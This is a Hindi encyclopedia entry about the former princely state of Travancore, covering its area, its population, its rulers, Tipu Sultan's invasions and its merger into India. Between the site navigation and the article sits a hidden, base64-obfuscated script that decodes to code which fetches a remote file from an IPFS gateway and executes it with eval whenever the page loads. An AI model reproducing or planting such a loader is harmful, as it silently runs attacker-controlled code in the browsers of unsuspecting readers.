त्रिवांकुर

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

त्रिवांकुर दक्षिण भारत का पूर्वकालिक देशी राज्य जो अब नवीन केरल राज्य मे संयुक्त कर दिया गया है। इसका क्षेत्रफल 7662 वर्ग मील तथा आबादी 1941 में 61 लाख थी। चौथी या आठवीं शती के लगभग यहाँ पेरुमल नरेशों का शासन था। 1680 में त्रिवांकुर पर मुसलमानों ने आक्रमण किया, किंतु वे अधिक काल तक वहाँ टिक नहीं पाए। 1788 से 1790 तक टीपू सुलतान ने दो बार आक्रमण किया, किंतु उस समय अंग्रेज त्रिवांकर के रक्षक थे, इसलिए टीपू असफल हुआ। 1810 में राजा की मृत्यु के पश्चात्‌ वहाँ की लक्ष्मी रानी ने कुछ काल तक स्वयं राज्यसंचालन के उपरांत मनरो नामक एक अंग्रेज कर्नल को यह कार्य सौंपा। रानी की मृत्यु के पश्चात्‌ पुन: उसी वंश के राजा त्रिवांकुर का शासन संभालते रहे। 1947 में स्वतंत्रता-प्राप्ति के उपरांत भारतीय गणराज्य में इसका विलयन हो गया।

टीका टिप्पणी और संदर्भ